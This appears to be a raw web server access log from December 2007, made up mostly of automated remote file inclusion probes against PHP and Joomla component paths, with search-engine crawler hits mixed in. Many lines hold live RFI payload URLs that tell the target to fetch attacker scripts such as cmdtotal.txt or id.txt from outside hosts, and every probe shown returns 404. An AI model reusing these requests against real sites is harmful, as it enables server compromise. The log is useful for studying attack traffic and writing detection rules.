82.122.224.146 - - [02/Dec/2007:16:02:57 -0800] "GET /logs/access_071105.log/main.php?x=http://124.0.201.20/bbs000/id.txt? HTTP/1.0" 404 275 "-" "libwww-perl/5.48" "www.galf.org"
82.122.224.146 - - [02/Dec/2007:16:02:57 -0800] "GET /main.php?x=http://124.0.201.20/bbs000/id.txt? HTTP/1.0" 404 275 "-" "libwww-perl/5.48"
82.122.224.146 - - [02/Dec/2007:16:02:58 -0800] "GET /logs/main.php?x=http://124.0.201.20/bbs000/id.txt? HTTP/1.0" 404 275 "-" "libwww-perl/5.48" "www.galf.org"
89.159.200.63 - - [02/Dec/2007:16:04:00 -0800] "GET /logs/access.log HTTP/1.0" 200 481 "-" "Lynx/2.8.5rel.1 libwww-FM/2.14 SSL-MM/1.4.1 GNUTLS/1.4.4" "www.galf.org"
87.118.112.238 - - [02/Dec/2007:16:05:28 -0800] "GET /logs/access_071014.log//icontent/include/wysiwyg/spaw_control.class.php?spaw_root=http://www.talomark.com/iloinenpuutarha/.tmp/icon.gif?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.galf.org"
87.118.112.238 - - [02/Dec/2007:16:05:29 -0800] "GET /logs//icontent/include/wysiwyg/spaw_control.class.php?spaw_root=http://www.talomark.com/iloinenpuutarha/.tmp/icon.gif?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.galf.org"
217.151.228.18 - - [02/Dec/2007:16:05:37 -0800] "GET /logs/access_071105.log/main.php?x=http://124.0.201.20/bbs000/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.galf.org"
217.151.228.18 - - [02/Dec/2007:16:05:39 -0800] "GET /main.php?x=http://124.0.201.20/bbs000/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.galf.org"
217.151.228.18 - - [02/Dec/2007:16:05:41 -0800] "GET /logs/main.php?x=http://124.0.201.20/bbs000/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.galf.org"
66.249.73.202 - - [02/Dec/2007:16:12:53 -0800] "GET /robots.txt HTTP/1.1" 404 275 "-" "Mozilla/5.0 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)" "www.galf.org"
66.249.73.202 - - [02/Dec/2007:16:12:55 -0800] "GET /logs/access_070618.log HTTP/1.1" 200 715099 "-" "Mozilla/5.0 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)" "www.galf.org"
66.249.73.202 - - [02/Dec/2007:16:12:56 -0800] "GET /logs/access_071029.log HTTP/1.1" 200 1274660 "-" "Mozilla/5.0 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)" "www.galf.org"
212.175.205.226 - - [02/Dec/2007:16:15:23 -0800] "GET /logs///////////modules/4nAlbum/public/displayCategory.php?basepath=http://www.x-fox.de/cmdtotal.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.galf.org"
212.175.205.226 - - [02/Dec/2007:16:15:23 -0800] "GET ///////////modules/4nAlbum/public/displayCategory.php?basepath=http://www.x-fox.de/cmdtotal.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.galf.org"
212.175.205.226 - - [02/Dec/2007:16:16:22 -0800] "GET /logs////////////administrator/components/com_peoplebook/param.peoplebook.php?mosConfig_absolute_path=http://www.x-fox.de/cmdtotal.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.galf.org"
212.175.205.226 - - [02/Dec/2007:16:16:22 -0800] "GET ////////////administrator/components/com_peoplebook/param.peoplebook.php?mosConfig_absolute_path=http://www.x-fox.de/cmdtotal.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.galf.org"
85.214.95.45 - - [02/Dec/2007:16:17:04 -0800] "GET /logs//administrator/components/com_serverstat/install.serverstat.php?mosConfig_absolute_path=http://maciek.rootnode.pl/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.galf.org"
85.214.95.45 - - [02/Dec/2007:16:17:05 -0800] "GET //administrator/components/com_serverstat/install.serverstat.php?mosConfig_absolute_path=http://maciek.rootnode.pl/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.galf.org"
74.200.83.90 - - [02/Dec/2007:16:17:30 -0800] "GET /logs/components/com_artlinks/artlinks.dispnew.php?mosConfig_absolute_path=http://www.isys-bw.de/contr.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.galf.org"
74.200.83.90 - - [02/Dec/2007:16:17:30 -0800] "GET /components/com_artlinks/artlinks.dispnew.php?mosConfig_absolute_path=http://www.isys-bw.de/contr.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.galf.org"
209.200.57.200 - - [02/Dec/2007:16:19:41 -0800] "GET /administrator/components/com_webring/admin.webring.docs.php?component_dir=ftp://80.50.253.90/upload/071011004039p/old? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.galf.org"
209.200.57.200 - - [02/Dec/2007:16:19:41 -0800] "GET /administrator/components/com_webring/admin.webring.docs.php?component_dir=ftp://ftp.metaltrade.ru/incoming/%FF%FF%FF%FF%FF%FFo%FF%FF%FF%FF%FF%FF/1? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.galf.org"
217.151.228.18 - - [02/Dec/2007:16:20:05 -0800] "GET /logs/access_071119.log/index.php?x=http://124.0.201.20/bbs000/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.galf.org"
66.249.73.202 - - [02/Dec/2007:16:20:26 -0800] "GET / HTTP/1.1" 200 1048 "-" "Mozilla/5.0 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)"
74.200.83.90 - - [02/Dec/2007:16:25:14 -0800] "GET /logs//include.php?path[docroot]=http://www.isys-bw.de/contr.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.galf.org"
74.200.83.90 - - [02/Dec/2007:16:25:14 -0800] "GET //include.php?path[docroot]=http://www.isys-bw.de/contr.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.galf.org"
82.122.224.146 - - [02/Dec/2007:16:28:07 -0800] "GET /logs/access_071105.log/main.php?x=http://124.0.201.20/bbs000/id.txt? HTTP/1.0" 404 275 "-" "libwww-perl/5.48"
82.122.224.146 - - [02/Dec/2007:16:28:08 -0800] "GET /main.php?x=http://124.0.201.20/bbs000/id.txt? HTTP/1.0" 404 275 "-" "libwww-perl/5.48" "www.galf.org"
82.122.224.146 - - [02/Dec/2007:16:28:08 -0800] "GET /logs/main.php?x=http://124.0.201.20/bbs000/id.txt? HTTP/1.0" 404 275 "-" "libwww-perl/5.48" "www.galf.org"
210.114.223.26 - - [02/Dec/2007:16:30:31 -0800] "GET /logs//administrator/components/com_serverstat/install.serverstat.php?mosConfig_absolute_path=http://inimigo.t35.com/safeon.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.galf.org"
210.114.223.26 - - [02/Dec/2007:16:30:31 -0800] "GET //administrator/components/com_serverstat/install.serverstat.php?mosConfig_absolute_path=http://inimigo.t35.com/safeon.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.galf.org"
62.141.54.164 - - [02/Dec/2007:16:31:01 -0800] "GET /logs/access_071014.log/default.php?arquivo=http://cotine.net/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.galf.org"
62.141.54.164 - - [02/Dec/2007:16:31:01 -0800] "GET /default.php?arquivo=http://cotine.net/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.galf.org"
62.141.54.164 - - [02/Dec/2007:16:31:01 -0800] "GET /logs/default.php?arquivo=http://cotine.net/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.galf.org"
212.175.205.226 - - [02/Dec/2007:16:31:47 -0800] "GET /logs/access_071029.log////////////administrator/components/com_peoplebook/param.peoplebook.php?mosConfig_absolute_path=http://www.x-fox.de/cmdtotal.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.galf.org"
212.175.205.226 - - [02/Dec/2007:16:32:24 -0800] "GET //////////modules/My_eGallery/index.php?basepath=http://www.x-fox.de/cmdtotal.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.galf.org"
74.52.158.98 - - [02/Dec/2007:16:32:44 -0800] "GET /logs/index2.php?page=http://www.dip-kostroma.ru/bak_skompa/themes/runcms/menu/images/.asc/www????????????????????????????? HTTP/1.1" 404 275 "-" "libwww-perl/5.79"
74.52.158.98 - - [02/Dec/2007:16:32:44 -0800] "GET /index2.php?page=http://www.dip-kostroma.ru/bak_skompa/themes/runcms/menu/images/.asc/www????????????????????????????? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.galf.org"
212.175.205.226 - - [02/Dec/2007:16:33:34 -0800] "GET /logs/access_071112.log////////////administrator/components/com_peoplebook/param.peoplebook.php?mosConfig_absolute_path=http://www.x-fox.de/cmdtotal.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.galf.org"
210.250.39.12 - - [02/Dec/2007:16:36:41 -0800] "GET /logs//administrator/components/com_serverstat/install.serverstat.php?mosConfig_absolute_path=http://inimigo.t35.com/safeon.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.galf.org"
210.250.39.12 - - [02/Dec/2007:16:36:43 -0800] "GET //administrator/components/com_serverstat/install.serverstat.php?mosConfig_absolute_path=http://inimigo.t35.com/safeon.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.galf.org"
82.122.224.146 - - [02/Dec/2007:16:37:07 -0800] "GET /main.php?x=http://124.0.201.20/bbs000/test.txt? HTTP/1.0" 404 275 "-" "libwww-perl/5.48" "www.galf.org"
202.129.35.5 - - [02/Dec/2007:16:38:41 -0800] "GET /logs//administrator/components/com_serverstat/install.serverstat.php?mosConfig_absolute_path=http://inimigo.t35.com/safeon.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.galf.org"
202.129.35.5 - - [02/Dec/2007:16:38:42 -0800] "GET //administrator/components/com_serverstat/install.serverstat.php?mosConfig_absolute_path=http://inimigo.t35.com/safeon.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.galf.org"
65.38.180.7 - - [02/Dec/2007:16:39:34 -0800] "GET //templates/headline_temp.php?nst_inc=http://adm-adserver.com/cmd.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.galf.org"
65.38.180.7 - - [02/Dec/2007:16:40:23 -0800] "GET /logs/access_070702.log//templates/headline_temp.php?nst_inc=http://adm-adserver.com/cmd.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.galf.org"
65.38.180.7 - - [02/Dec/2007:16:40:32 -0800] "GET /logs//templates/headline_temp.php?nst_inc=http://adm-adserver.com/cmd.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.galf.org"
38.114.104.57 - - [02/Dec/2007:16:41:47 -0800] "GET /robots.txt HTTP/1.0" 404 275 "-" "Gigabot/3.0 (http://www.gigablast.com/spider.html)" "www.galf.org"
38.114.104.42 - - [02/Dec/2007:16:41:48 -0800] "GET /logs/access_070514.log HTTP/1.0" 404 275 "-" "Gigabot/3.0 (http://www.gigablast.com/spider.html)" "www.galf.org"
88.84.147.165 - - [02/Dec/2007:16:42:41 -0800] "GET /index.php?rage=http://www.n0n-clan.net//vwar/convert/test.txt??? HTTP/1.1" 404 275 "-" "Mozilla/4.0 (compatible; MSIE 6.0; America Online Browser 1.1; rev1.5; Windows NT 5.1;)" "www.galf.org"
88.84.147.165 - - [02/Dec/2007:16:42:42 -0800] "GET /logs/index.php?rage=http://www.n0n-clan.net//vwar/convert/test.txt??? HTTP/1.1" 404 275 "-" "Mozilla/4.0 (compatible; MSIE 6.0; America Online Browser 1.1; rev1.5; Windows NT 5.1;)" "www.galf.org"
212.175.205.226 - - [02/Dec/2007:16:44:19 -0800] "GET /logs/access_070903.log///////////modules/4nAlbum/public/displayCategory.php?basepath=http://www.x-fox.de/cmdtotal.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.galf.org"
202.60.74.106 - - [02/Dec/2007:16:44:23 -0800] "GET /logs/index.php3?i=http://intranet.stantonmortgage.com/modules/admin/bersama/doc.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805"
202.60.74.106 - - [02/Dec/2007:16:44:24 -0800] "GET /index.php3?i=http://intranet.stantonmortgage.com/modules/admin/bersama/doc.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.galf.org"
82.122.224.146 - - [02/Dec/2007:16:45:10 -0800] "GET /logs/access_071105.log/default.php?page=http://124.0.201.20/bbs000/id.txt? HTTP/1.0" 404 275 "-" "libwww-perl/5.48" "www.galf.org"
82.122.224.146 - - [02/Dec/2007:16:45:10 -0800] "GET /default.php?page=http://124.0.201.20/bbs000/id.txt? HTTP/1.0" 404 275 "-" "libwww-perl/5.48" "www.galf.org"
82.122.224.146 - - [02/Dec/2007:16:45:11 -0800] "GET /logs/default.php?page=http://124.0.201.20/bbs000/id.txt? HTTP/1.0" 404 275 "-" "libwww-perl/5.48" "www.galf.org"
66.249.73.202 - - [02/Dec/2007:16:46:05 -0800] "GET /robots.txt HTTP/1.1" 404 275 "-" "Mozilla/5.0 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)" "galf.org"
189.145.92.185 - - [02/Dec/2007:16:46:07 -0800] "GET /cendoc.php HTTP/1.1" 404 275 "http://www.lesbianas.tv/" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322; .NET CLR 2.0.50727; InfoPath.2)" "www.galf.org"
66.249.73.202 - - [02/Dec/2007:16:46:14 -0800] "GET /logs/access_070924.log HTTP/1.1" 200 5349452 "-" "Mozilla/5.0 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)" "galf.org"
212.175.205.226 - - [02/Dec/2007:16:46:35 -0800] "GET /logs/access_070826.log//////////modules/My_eGallery/index.php?basepath=http://www.x-fox.de/cmdtotal.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.galf.org"
212.175.205.226 - - [02/Dec/2007:16:46:36 -0800] "GET /logs//////////modules/My_eGallery/index.php?basepath=http://www.x-fox.de/cmdtotal.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.galf.org"
212.175.205.226 - - [02/Dec/2007:16:46:41 -0800] "GET /logs/access_070730.log//////////modules/My_eGallery/index.php?basepath=http://www.x-fox.de/cmdtotal.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.galf.org"
82.116.32.13 - - [02/Dec/2007:16:47:23 -0800] "GET /logs/access_070723.log/index2.php?page=http://www.dip-kostroma.ru/bak_skompa/themes/runcms/menu/images/.asc/www????????????????????????????? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.galf.org"
82.116.32.13 - - [02/Dec/2007:16:47:23 -0800] "GET /index2.php?page=http://www.dip-kostroma.ru/bak_skompa/themes/runcms/menu/images/.asc/www????????????????????????????? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.galf.org"
82.116.32.13 - - [02/Dec/2007:16:47:24 -0800] "GET /logs/index2.php?page=http://www.dip-kostroma.ru/bak_skompa/themes/runcms/menu/images/.asc/www????????????????????????????? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.galf.org"
62.141.54.164 - - [02/Dec/2007:16:47:29 -0800] "GET /logs/access_070806.log/index.php?x=http://cotine.net/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.galf.org"
62.141.54.164 - - [02/Dec/2007:16:47:30 -0800] "GET /index.php?x=http://cotine.net/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.galf.org"
62.141.54.164 - - [02/Dec/2007:16:47:30 -0800] "GET /logs/index.php?x=http://cotine.net/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.galf.org"
66.249.73.202 - - [02/Dec/2007:16:48:37 -0800] "GET /logs/access_070820.log HTTP/1.1" 200 2659344 "-" "Mozilla/5.0 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)" "galf.org"
202.67.206.198 - - [02/Dec/2007:16:49:28 -0800] "GET /logs//administrator/components/com_serverstat/install.serverstat.php?mosConfig_absolute_path=http://inimigo.t35.com/safeon.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.800" "www.galf.org"
202.67.206.198 - - [02/Dec/2007:16:49:28 -0800] "GET //administrator/components/com_serverstat/install.serverstat.php?mosConfig_absolute_path=http://inimigo.t35.com/safeon.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.800" "www.galf.org"
82.116.32.13 - - [02/Dec/2007:16:49:44 -0800] "GET /logs/access_070702.log/index2.php?page=http://www.dip-kostroma.ru/bak_skompa/themes/runcms/menu/images/.asc/www????????????????????????????? HTTP/1.1" 404 275 "-" "libwww-perl/5.805"
212.175.205.226 - - [02/Dec/2007:16:50:40 -0800] "GET /logs/access_070827.log///////////modules/4nAlbum/public/displayCategory.php?basepath=http://www.x-fox.de/cmdtotal.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.galf.org"
217.151.228.18 - - [02/Dec/2007:16:52:59 -0800] "GET /logs/access_071015.log/index.php?x=http://124.0.201.20/bbs000/test.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.galf.org"
217.151.228.18 - - [02/Dec/2007:16:53:00 -0800] "GET /logs/index.php?x=http://124.0.201.20/bbs000/test.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.galf.org"
203.144.225.125 - - [02/Dec/2007:16:53:38 -0800] "GET /logs//administrator/components/com_serverstat/install.serverstat.php?mosConfig_absolute_path=http://inimigo.t35.com/safeon.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.galf.org"
203.144.225.125 - - [02/Dec/2007:16:53:39 -0800] "GET //administrator/components/com_serverstat/install.serverstat.php?mosConfig_absolute_path=http://inimigo.t35.com/safeon.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.galf.org"
210.114.223.26 - - [02/Dec/2007:16:59:37 -0800] "GET /logs//components/com_facileforms/facileforms.frame.php?ff_compath=http://inimigo.t35.com/safeon.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.galf.org"
210.114.223.26 - - [02/Dec/2007:16:59:38 -0800] "GET //components/com_facileforms/facileforms.frame.php?ff_compath=http://inimigo.t35.com/safeon.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.galf.org"
219.94.129.87 - - [02/Dec/2007:17:00:49 -0800] "GET /logs/access_071015.log/contenido/classes/class.inuse.php?cfg[path][contenido]=http://sagasufx.com/rulez.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.galf.org"
219.94.129.87 - - [02/Dec/2007:17:00:50 -0800] "GET /contenido/classes/class.inuse.php?cfg[path][contenido]=http://sagasufx.com/rulez.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.galf.org"
219.94.129.87 - - [02/Dec/2007:17:00:50 -0800] "GET /logs/contenido/classes/class.inuse.php?cfg[path][contenido]=http://sagasufx.com/rulez.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.galf.org"
82.122.224.146 - - [02/Dec/2007:17:02:50 -0800] "GET /default.php?page=http://124.0.201.20/bbs000/test.txt? HTTP/1.0" 404 275 "-" "libwww-perl/5.48" "www.galf.org"
72.232.11.218 - - [02/Dec/2007:17:06:49 -0800] "GET /administrator/components/com_webring/admin.webring.docs.php?component_dir=http://www.altersrente.de/banner/.../about.gif?? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.galf.org"
72.232.11.218 - - [02/Dec/2007:17:06:49 -0800] "GET /administrator/components/com_webring/admin.webring.docs.php?component_dir=http://www.altersrente.de/banner/.../safe.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.galf.org"
217.151.228.18 - - [02/Dec/2007:17:07:46 -0800] "GET /logs/access_071105.log/default.php?page=http://124.0.201.20/bbs000/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.galf.org"
217.151.228.18 - - [02/Dec/2007:17:07:48 -0800] "GET /default.php?page=http://124.0.201.20/bbs000/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.galf.org"
217.151.228.18 - - [02/Dec/2007:17:07:49 -0800] "GET /logs/default.php?page=http://124.0.201.20/bbs000/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.galf.org"
74.52.158.98 - - [02/Dec/2007:17:08:07 -0800] "GET /logs/index2.php?page=http://ezec.us/magic/a? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.galf.org"
74.52.158.98 - - [02/Dec/2007:17:08:07 -0800] "GET /index2.php?page=http://ezec.us/magic/a? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.galf.org"
62.2.177.15 - - [02/Dec/2007:17:09:15 -0800] "GET /logs//administrator/components/com_serverstat/install.serverstat.php?mosConfig_absolute_path=http://inimigo.t35.com/safeon.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.galf.org"
62.2.177.15 - - [02/Dec/2007:17:09:21 -0800] "GET //administrator/components/com_serverstat/install.serverstat.php?mosConfig_absolute_path=http://inimigo.t35.com/safeon.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.galf.org"
88.84.147.165 - - [02/Dec/2007:17:10:34 -0800] "GET /index.php?principal=http://www.n0n-clan.net//vwar/convert/test.txt??? HTTP/1.1" 404 275 "-" "Mozilla/4.0 (compatible; MSIE 6.0; America Online Browser 1.1; rev1.5; Windows NT 5.1;)" "www.galf.org"
88.84.147.165 - - [02/Dec/2007:17:10:37 -0800] "GET /logs/index.php?principal=http://www.n0n-clan.net//vwar/convert/test.txt??? HTTP/1.1" 404 275 "-" "Mozilla/4.0 (compatible; MSIE 6.0; America Online Browser 1.1; rev1.5; Windows NT 5.1;)" "www.galf.org"
209.200.57.200 - - [02/Dec/2007:17:11:03 -0800] "GET /logs/access_070917.log/administrator/components/com_comprofiler/plugin.class.php?mosConfig_absolute_path=ftp://80.50.253.90/upload/071011004039p/old? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.galf.org"
209.200.57.200 - - [02/Dec/2007:17:11:03 -0800] "GET /administrator/components/com_comprofiler/plugin.class.php?mosConfig_absolute_path=ftp://80.50.253.90/upload/071011004039p/old? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.galf.org"
209.200.57.200 - - [02/Dec/2007:17:11:03 -0800] "GET /logs/administrator/components/com_comprofiler/plugin.class.php?mosConfig_absolute_path=ftp://80.50.253.90/upload/071011004039p/old? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.galf.org"
209.200.57.200 - - [02/Dec/2007:17:11:16 -0800] "GET /logs/access_071105.log/administrator/components/com_comprofiler/plugin.class.php?mosConfig_absolute_path=ftp://80.50.253.90/upload/071011004039p/old? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.galf.org"
88.84.147.165 - - [02/Dec/2007:17:11:20 -0800] "GET /logs/index.php?doc=http://www.n0n-clan.net//vwar/convert/test.txt??? HTTP/1.1" 404 275 "-" "Mozilla/4.0 (compatible; MSIE 6.0; America Online Browser 1.1; rev1.5; Windows NT 5.1;)" "www.galf.org"
88.84.147.165 - - [02/Dec/2007:17:11:22 -0800] "GET /index.php?doc=http://www.n0n-clan.net//vwar/convert/test.txt??? HTTP/1.1" 404 275 "-" "Mozilla/4.0 (compatible; MSIE 6.0; America Online Browser 1.1; rev1.5; Windows NT 5.1;)"
65.55.208.231 - - [02/Dec/2007:17:11:54 -0800] "GET /robots.txt HTTP/1.0" 404 275 "-" "msnbot/1.0 (+http://search.msn.com/msnbot.htm)" "www.galf.org"
65.55.208.231 - - [02/Dec/2007:17:11:54 -0800] "GET /logs/ HTTP/1.0" 200 5355 "-" "msnbot/1.0 (+http://search.msn.com/msnbot.htm)" "www.galf.org"
217.151.228.18 - - [02/Dec/2007:17:13:54 -0800] "GET /logs/access_071119.log/index.php?x=http://124.0.201.20/bbs000/test.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.galf.org"
68.126.186.130 - - [02/Dec/2007:17:15:46 -0800] "GET /logs/access_071015.log HTTP/1.0" 200 1180619 "http://www.galf.org/logs/access_071015.log" "Mozilla/4.08 [en] (Win98; I ;Nav)" "www.galf.org"
68.126.186.130 - - [02/Dec/2007:17:15:57 -0800] "GET /logs/access_070820.log HTTP/1.0" 200 2659344 "http://galf.org/logs/access_070820.log" "Mozilla/4.08 [en] (Win98; I ;Nav)" "galf.org"
210.250.39.12 - - [02/Dec/2007:17:16:30 -0800] "GET /logs//components/com_facileforms/facileforms.frame.php?ff_compath=http://inimigo.t35.com/safeon.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.galf.org"
210.250.39.12 - - [02/Dec/2007:17:16:33 -0800] "GET //components/com_facileforms/facileforms.frame.php?ff_compath=http://inimigo.t35.com/safeon.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.galf.org"
196.30.221.50 - - [02/Dec/2007:17:16:39 -0800] "GET /logs/access_070716.log/index.php?go=http://www.dip-kostroma.ru/bak_skompa/themes/runcms/menu/images/.asc/www????????????????????????????? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.galf.org"
196.30.221.50 - - [02/Dec/2007:17:16:40 -0800] "GET /index.php?go=http://www.dip-kostroma.ru/bak_skompa/themes/runcms/menu/images/.asc/www????????????????????????????? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.galf.org"
196.30.221.50 - - [02/Dec/2007:17:16:40 -0800] "GET /logs/index.php?go=http://www.dip-kostroma.ru/bak_skompa/themes/runcms/menu/images/.asc/www????????????????????????????? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.galf.org"
196.30.221.50 - - [02/Dec/2007:17:16:52 -0800] "GET /logs/access_070723.log/index.php?go=http://www.dip-kostroma.ru/bak_skompa/themes/runcms/menu/images/.asc/www????????????????????????????? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.galf.org"
82.116.32.13 - - [02/Dec/2007:17:17:39 -0800] "GET /logs/access_071015.log//modules/xt_conteudo/admin/spaw/spaw_control.class.php?spaw_root=http://www.dip-kostroma.ru/bak_skompa/themes/runcms/menu/images/.asc/www????????????????????????????? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.galf.org"
82.116.32.13 - - [02/Dec/2007:17:17:39 -0800] "GET //modules/xt_conteudo/admin/spaw/spaw_control.class.php?spaw_root=http://www.dip-kostroma.ru/bak_skompa/themes/runcms/menu/images/.asc/www????????????????????????????? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.galf.org"
82.116.32.13 - - [02/Dec/2007:17:17:40 -0800] "GET /logs//modules/xt_conteudo/admin/spaw/spaw_control.class.php?spaw_root=http://www.dip-kostroma.ru/bak_skompa/themes/runcms/menu/images/.asc/www????????????????????????????? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.galf.org"
82.116.32.13 - - [02/Dec/2007:17:18:42 -0800] "GET /logs/access_071014.log//modules/xt_conteudo/admin/spaw/spaw_control.class.php?spaw_root=http://www.dip-kostroma.ru/bak_skompa/themes/runcms/menu/images/.asc/www????????????????????????????? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.galf.org"
217.151.228.18 - - [02/Dec/2007:17:19:15 -0800] "GET /logs/access_071105.log/main.php?x=http://124.0.201.20/bbs000/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.galf.org"
217.151.228.18 - - [02/Dec/2007:17:19:17 -0800] "GET /main.php?x=http://124.0.201.20/bbs000/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.galf.org"
217.151.228.18 - - [02/Dec/2007:17:19:18 -0800] "GET /logs/main.php?x=http://124.0.201.20/bbs000/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.galf.org"
72.232.11.218 - - [02/Dec/2007:17:22:00 -0800] "GET /logs/access_071022.log/administrator/components/com_webring/admin.webring.docs.php?component_dir=http://www.altersrente.de/banner/.../about.gif?? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.galf.org"
72.232.11.218 - - [02/Dec/2007:17:22:00 -0800] "GET /logs/access_071022.log/administrator/components/com_webring/admin.webring.docs.php?component_dir=http://www.altersrente.de/banner/.../safe.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.galf.org"
72.232.11.218 - - [02/Dec/2007:17:22:00 -0800] "GET /logs/administrator/components/com_webring/admin.webring.docs.php?component_dir=http://www.altersrente.de/banner/.../about.gif?? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.galf.org"
72.232.11.218 - - [02/Dec/2007:17:22:00 -0800] "GET /logs/administrator/components/com_webring/admin.webring.docs.php?component_dir=http://www.altersrente.de/banner/.../safe.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.galf.org"
62.141.54.164 - - [02/Dec/2007:17:23:08 -0800] "GET /logs/access.log/index.php?page=&lang=http://cotine.net/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.galf.org"
62.141.54.164 - - [02/Dec/2007:17:23:09 -0800] "GET /index.php?page=&lang=http://cotine.net/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.galf.org"
62.141.54.164 - - [02/Dec/2007:17:23:09 -0800] "GET /logs/index.php?page=&lang=http://cotine.net/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.galf.org"
